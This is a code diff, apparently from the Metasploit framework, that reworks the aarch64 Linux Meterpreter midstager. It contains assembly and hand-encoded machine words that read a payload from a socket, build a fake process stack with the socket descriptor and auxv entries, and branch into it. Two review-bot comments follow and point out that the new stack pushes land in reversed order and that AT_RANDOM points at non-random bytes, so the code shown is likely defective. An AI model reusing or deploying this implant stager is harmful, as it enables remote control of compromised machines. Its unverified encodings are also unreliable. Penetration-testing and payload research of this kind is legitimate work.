diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s
index b10f4b8a32..eedf65b677 100644
--- a/external/source/shellcode/linux/aarch64/stage_mettle.s
+++ b/external/source/shellcode/linux/aarch64/stage_mettle.s
@@ -44,81 +44,48 @@ read_loop: subs x4, x4, x0 bne read_loop - /* set up the initial stack */ - /* - - add sp, sp, #80 - mov x4, #109 - eor x5, x5, x5 - stp x4, x5, [sp, #-16]! - - mov x1,#2 - mov x2,sp - mov x3,#0 - - mov x4,#2 - mov x5,sp - mov x6,x12 - mov x7,#0 - mov x8,#0 - mov x9,#7 - mov x10,x10 - mov x11,#0 - mov x12,#0 - - eor x0, x0, x0 - eor x1, x1, x1 - eor x2, x2, x2 - eor x3, x3, x3 - stp x4, x5, [sp, #-16]! - stp x6, x7, [sp, #-16]! - stp x7, x8, [sp, #-16]! - stp x9, x10, [sp, #-16]! - stp x11, x12, [sp, #-16]! - */ - + /* add entry_offset */ adr x0, entry ldr x0, [x0] - // entry_offset + mmap add x0, x0, x10 + mov x14, x0 - mov x8, x0 + /* set up the initial stack */ + mov x0, sp + and sp, x0, #-16 + add sp, sp, #(16 * 6) + /* argc = 2, argv[0] = 'm' */ + mov x0, #2 + mov x1, #109 + str x1, [sp] + mov x1, sp + stp x0, x1, [sp, #-16]! - /* Set up the fake stack. - For whatever reason, aarch64 binaries really want AT_RANDOM - to be available. */ - /* AT_NULL */ - eor x0, x0, x0 - eor x1, x1, x1 - stp x0, x1, [sp, #-16]! - /* AT_RANDOM */ - mov x2, #25 - mov x3, sp - stp x2, x3, [sp, #-16]! + /* argc = 2, argv[1] = 'x12 (sockfd)' */ + mov x2, x12 + mov x3, 0 + stp x2, x3, [sp, #-16]! - /* argc, argv[0], argv[1], envp */ - /* ideally these could all be empty, but unfortunately - we have to keep the stack aligned. it's easier to - just push an extra argument than care... */ - stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ - mov x0, 1 - mov x1, sp - stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + mov x4, 0 + mov x5, #7 /* AT_BASE */ + stp x4, x5, [sp, #-16]! - br x8 + mov x6, x10 + mov x7, #6 /* AT_PAGESZ */ + stp x6, x7, [sp, #-16]! - /* - mov x0, #109 - mov x1, x12 - stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ - /* mov x0, 2 - mov x1, sp - stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + mov x8, #0x1000 + mov x9, #25 /* AT_RANDOM */ + stp x8, x9, [sp, #-16]! 
-	/*
-	blr x8
-	*/
+	mov x10, x10
+	mov x11, #0 /* AT_NULL */
+	stp x10, x11, [sp, #-16]!
+
+	mov x29, #0
+	mov x30, #0
+	br x14
 failed:
 	mov x0, 0
@@ -132,6 +99,3 @@ size:
 entry:
 .word ENTRY
 .word 0
-m:
-.word 0x0000006d
-.word 0x00000000
diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb
index 43a0ca6615..a585ad2210 100644
--- a/modules/payloads/stages/linux/aarch64/meterpreter.rb
+++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb
@@ -41,8 +41,7 @@ module MetasploitModule
     midstager = [
-
-      0x10000582, # adr x2, b0
+      0x10000782, # adr x2, f0
       0xb9400042, # ldr w2, [x2]
       0xaa0203ea, # mov x10, x2
       0xd34cfc42, # lsr x2, x2, #12
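Review bot: At `br x14` the word pair at `[sp]` is (x10, 0) and the argc/argv[0] pair sits at `[sp, #80]`: the six pairs are built in argc→AT_NULL order, but `stp ..., [sp, #-16]!` pre-decrements, so the first pair pushed lands highest, whereas the Linux initial-stack layout the removed code followed (AT_NULL pushed first, argc last) needs argc at `[sp]`. The pair contents do match a sequential argc, argv[0], argv[1], NULL, NULL, AT_BASE, AT_PAGESZ, AT_RANDOM, AT_NULL reading, so reversing the order of the six `stp` groups (`stp x10, x11, [sp, #-16]!` first, `stp x0, x1, [sp, #-16]!` last) looks like the whole fix — unless the entry reached through `entry_offset` walks the block differently, so this should be confirmed on a live target — and the same sequence is hand-encoded in the meterpreter.rb hunk at `@@ -64,36 +63,49 @@`, which would need re-encoding. With that order AT_NULL's value word falls on the 'm' string at `[sp, #96]`, harmless but worth a comment, and `mov x10, x10` is a no-op that can go. Separately, AT_RANDOM is pointed at x10, which the removed `// entry_offset + mmap` comment suggests is the mapped image base, so the 16 bytes libc derives its stack-protector canary and pointer guard from are deterministic image bytes; a comment such as `/* AT_RANDOM: 16 readable bytes, not random */` would make that trade-off explicit. The enclosing stage body (`read_loop` above, the `failed:` exit below) starts before and ends after this hunk.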
@@ -64,36 +63,49 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000260, # cbz w0, a4 + 0x34000440, # cbz w0, e0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 0x54ffff01, # b.ne 44 - 0x10000280, # adr x0, b8 + 0x10000480, # adr x0, f8 0xf9400000, # ldr x0, [x0] 0x8b0a0000, # add x0, x0, x10 - 0xaa0003e8, # mov x8, x0 - 0xca000000, # eor x0, x0, x0 - 0xca010021, # eor x1, x1, x1 - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd2800322, # mov x2, #0x19 // #25 - 0x910003e3, # mov x3, sp - 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd2800020, # mov x0, #0x1 // #1 + 0xaa0003ee, # mov x14, x0 + 0x910003e0, # mov x0, sp + 0x927cec1f, # and sp, x0, #0xfffffffffffffff0 + 0x910183ff, # add sp, sp, #0x60 + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800da1, # mov x1, #0x6d // #109 + 0xf90003e1, # str x1, [sp] 0x910003e1, # mov x1, sp 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd61f0100, # br x8 + 0xaa0c03e2, # mov x2, x12 + 0xd2800003, # mov x3, #0x0 // #0 + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xd2800004, # mov x4, #0x0 // #0 + 0xd28000e5, # mov x5, #0x7 // #7 + 0xa9bf17e4, # stp x4, x5, [sp,#-16]! + 0xaa0a03e6, # mov x6, x10 + 0xd28000c7, # mov x7, #0x6 // #6 + 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! + 0xd2820008, # mov x8, #0x1000 // #4096 + 0xd2800329, # mov x9, #0x19 // #25 + 0xa9bf27e8, # stp x8, x9, [sp,#-16]! + 0xaa0a03ea, # mov x10, x10 + 0xd280000b, # mov x11, #0x0 // #0 + 0xa9bf2fea, # stp x10, x11, [sp,#-16]! 
+ 0xd280001d, # mov x29, #0x0 // #0 + 0xd280001e, # mov x30, #0x0 // #0 + 0xd61f01c0, # br x14 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 + 0xd503201f, # nop + payload.length, 0x00000000, # .word 0x00000000 entry_offset, 0x00000000, # .word 0x00000000 - 0x0000006d, # .word 0x0000006d - 0x00000000, # .word 0x00000000 - 0xd503201f, # nop - 0xd503201f, # nop ].pack('V*') print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")
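Review bot: The branch targets in this table are hand-computed word offsets (`adr x2, f0`, `adr x0, f8`, `cbz w0, e0` in the comments), so every word inserted before `payload.length` and `entry_offset` — including the added `0xd503201f, # nop` — silently shifts them, and nothing in the hunk documents that dependency. A comment above the array stating that `payload.length` and `entry_offset` must sit at the offsets the `adr` encodings name (0xf0 and 0xf8 from the first word, going by the comments) and that the words are regenerated from stage_mettle.s rather than edited by hand would save the next editor from a mis-encoded branch. `0xaa0a03ea, # mov x10, x10` encodes a no-op and could be dropped the next time the table is regenerated. The `midstager` array starts in the earlier hunk, outside this one.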